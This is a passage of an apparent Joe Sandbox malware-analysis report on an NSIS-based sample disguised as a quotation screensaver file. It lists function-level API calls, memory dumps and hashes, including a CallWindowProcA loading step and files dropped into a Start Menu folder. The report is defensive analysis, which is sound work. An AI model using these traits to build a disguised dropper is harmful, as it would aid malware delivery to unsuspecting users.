                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3850602802-0
                                                                                                                  • Opcode ID: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                  • Instruction ID: 95ec8208bb9d3a01d591897c0f28f5e1a7c334172ea667dd54b0e9ef813c1122
                                                                                                                  • Opcode Fuzzy Hash: ad26090b0340e2070b67bca4ec62d0689c621fd0dfd17d634d5529271b8843db
                                                                                                                  • Instruction Fuzzy Hash: 8DB01279381701BBDE619B40DF09F857E62E7A4B01F018038B344240F0CAB200A1DB1C
                                                                                                                  Function 00403489 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403187,?), ref: 00403497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                  • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                                                                                  • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                                                                  • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                                                                                                                  Function 00404460 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,0040423C), ref: 0040446A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2492992576-0
                                                                                                                  • Opcode ID: 1f7f9e3f122b332a8e7775b20afb68b5ad19b8e59313e3c0a19abecca79a7e66
                                                                                                                  • Instruction ID: cc2e19d72340fc38df13d303dd9c88f95a1a6e7c0bc1453e76388907d84a7ce8
                                                                                                                  • Opcode Fuzzy Hash: 1f7f9e3f122b332a8e7775b20afb68b5ad19b8e59313e3c0a19abecca79a7e66
                                                                                                                  • Instruction Fuzzy Hash: C6A002B55065009FDB515B50EF148057A61A754751751C479A1455013587314461EB19
                                                                                                                  Function 6D432AC8 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 6D432B87
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: fe0383335c5d01759df2ec5443935fdf5c5a937fdba86ee2c11b3ffc6c6e42c3
                                                                                                                  • Instruction ID: 8c2a71aed8edf47488527e926238602c63174e6fdeb2d10fae6199c4d4497451
                                                                                                                  • Opcode Fuzzy Hash: fe0383335c5d01759df2ec5443935fdf5c5a937fdba86ee2c11b3ffc6c6e42c3
                                                                                                                  • Instruction Fuzzy Hash: 2B412976508215AFDB30EF6ED9C1F6A37B4AB09358F238829E60596214CB39DD41CED1
                                                                                                                  Function 00401F80 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000,?), ref: 0040551B
                                                                                                                    • Part of subcall function 004054E2: lstrlenA.KERNEL32(9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F39,00000000), ref: 0040552B
                                                                                                                    • Part of subcall function 004054E2: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,0040A130,9/@,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,00000000,00000000,00000000), ref: 0040553E
                                                                                                                    • Part of subcall function 004054E2: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll), ref: 00405550
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405576
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405590
                                                                                                                    • Part of subcall function 004054E2: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040559E
                                                                                                                    • Part of subcall function 00405A37: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422158,?,user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),user32::CallWindowProcA(i r1 ,i 0,i 0, i 0, i 0),?,988,00000000), ref: 00405A60
                                                                                                                    • Part of subcall function 00405A37: CloseHandle.KERNEL32(?), ref: 00405A6D
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC5
                                                                                                                    • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                                                                                    • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                                                                                    • Part of subcall function 004062FC: wsprintfA.USER32 ref: 00406309
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2972824698-0
                                                                                                                  • Opcode ID: 673a61a808363045433cb99f059c0d7be567a09120ada3e2c0025c65156c0f91
                                                                                                                  • Instruction ID: f241134767d5288ed7bb582f7a277e7668cfc0492802cda8b80f96db72c2547c
                                                                                                                  • Opcode Fuzzy Hash: 673a61a808363045433cb99f059c0d7be567a09120ada3e2c0025c65156c0f91
                                                                                                                  • Instruction Fuzzy Hash: ABF0B472A151659BCB30FBA58A849FF62A4DF40318B25853FF501B21D1C77C4E42AEAE

                                                                                                                  Non-executed Functions

                                                                                                                  Function 004048D0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040491F
                                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404949
                                                                                                                  • SHBrowseForFolderA.SHELL32(?,0041FD28,?), ref: 004049FA
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404A05
                                                                                                                  • lstrcmpiA.KERNEL32(Call,Inaugurates Setup: Installing), ref: 00404A37
                                                                                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404A43
                                                                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404A55
                                                                                                                    • Part of subcall function 00405A98: GetDlgItemTextA.USER32(?,?,00000400,00404A8C), ref: 00405AAB
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066F0
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 004066FD
                                                                                                                    • Part of subcall function 00406698: CharNextA.USER32(0000000C,?,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406702
                                                                                                                    • Part of subcall function 00406698: CharPrevA.USER32(0000000C,0000000C,76273410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1Quotation.scr.exe",004034AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00406712
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0041F920,?,?,0000040F,?,0041F920,0041F920,?,?,0041F920,?,?,000003FB,?), ref: 00404B13
                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404B2E
                                                                                                                    • Part of subcall function 00404C87: lstrlenA.KERNEL32(Inaugurates Setup: Installing,Inaugurates Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404BA2,000000DF,00000000,00000400,?), ref: 00404D25
                                                                                                                    • Part of subcall function 00404C87: wsprintfA.USER32 ref: 00404D2D
                                                                                                                    • Part of subcall function 00404C87: SetDlgItemTextA.USER32(?,Inaugurates Setup: Installing), ref: 00404D40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55$Call$Inaugurates Setup: Installing
                                                                                                                  • API String ID: 2624150263-829823585
                                                                                                                  • Opcode ID: 1d6d53a53166e82ccdd80ef04311da82031ef37d39a98e5a17c24546c3f9c785
                                                                                                                  • Instruction ID: 6943db03b607a155a02b5e8c3ebfbf73ab388a007ceab65b8a57408dfeb96838
                                                                                                                  • Opcode Fuzzy Hash: 1d6d53a53166e82ccdd80ef04311da82031ef37d39a98e5a17c24546c3f9c785
                                                                                                                  • Instruction Fuzzy Hash: 05A16EB1A00219AADB11AFA5CD45BAF77B8EF84314F10843BF601B62D1D77C9A418F6D
                                                                                                                  Function 6D431B28 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6D4312A5: GlobalAlloc.KERNEL32(00000040,6D4312C3,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312AD
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6D431C54
                                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 6D431C9C
                                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 6D431CA6
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431CB9
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431D99
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431D9E
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431DA3
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D431F8A
                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 6D432128
                                                                                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 6D4321A4
                                                                                                                  • LoadLibraryA.KERNEL32(00000008), ref: 6D4321B5
                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6D43220E
                                                                                                                  • lstrlenA.KERNEL32(00000408), ref: 6D432228
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 245916457-0
                                                                                                                  • Opcode ID: dd544da3db7c943a4bb0baf58498fe9093984b0fe05073e5ddca142ad4fee49c
                                                                                                                  • Instruction ID: 268ad79331cc6259d21b08f54fd060239693545fda7cbf05e4500f018cfea802
                                                                                                                  • Opcode Fuzzy Hash: dd544da3db7c943a4bb0baf58498fe9093984b0fe05073e5ddca142ad4fee49c
                                                                                                                  • Instruction Fuzzy Hash: 65229271D54666DEDB21CFAEC480BADBBF0BB0E305F22852ED165A2240DB745D46CF90
                                                                                                                  Function 00402178 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(00408410,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FD
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AF
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines, xrefs: 0040223D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55\Jolines
                                                                                                                  • API String ID: 123533781-4275992298
                                                                                                                  • Opcode ID: 0c8f3c06a477d01b9c8f11521c24a9bb4a7775a58ae3338e39722cd95c61b77a
                                                                                                                  • Instruction ID: 544caa13f183a37799d4b8521df5ad80af76a61f373c87fcaa445c9ca5772f75
                                                                                                                  • Opcode Fuzzy Hash: 0c8f3c06a477d01b9c8f11521c24a9bb4a7775a58ae3338e39722cd95c61b77a
                                                                                                                  • Instruction Fuzzy Hash: 3A510671A00208AFDF10DFE4CA88A9D7BB6FF48314F2045BAF515EB2D1DA799981CB54
                                                                                                                  Function 004027AF Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027BE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                  • Instruction ID: 4b364e2ef7a68d88127de6e9c9a509213a8842fc61a1f6e93e5d2c2fa1513295
                                                                                                                  • Opcode Fuzzy Hash: 23a51d4048371150d615cd00007c864c0cc535fd28d0437de54ccd7a3f6eddd4
                                                                                                                  • Instruction Fuzzy Hash: A2F0A072604108EFD710DBA49A49AFEB768AF61324F2005BFE142B20C1C6B849559B3E
                                                                                                                  Function 00404E43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404E5A
                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404E67
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404EB6
                                                                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404ECD
                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00405456), ref: 00404EE7
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404EF9
                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404F0D
                                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404F23
                                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404F2F
                                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404F3F
                                                                                                                  • DeleteObject.GDI32(00000110), ref: 00404F44
                                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404F6F
                                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404F7B
                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405015
                                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00405045
                                                                                                                    • Part of subcall function 00404473: SendMessageA.USER32(00000028,?,?,004042A3), ref: 00404481
                                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405059
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00405087
                                                                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00405095
                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 004050A5
                                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 004051A0
                                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405205
                                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040521A
                                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040523E
                                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040525E
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00405273
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405283
                                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004052FC
                                                                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004053A5
                                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004053B4
                                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004053DF
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040542D
                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405438
                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040543F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
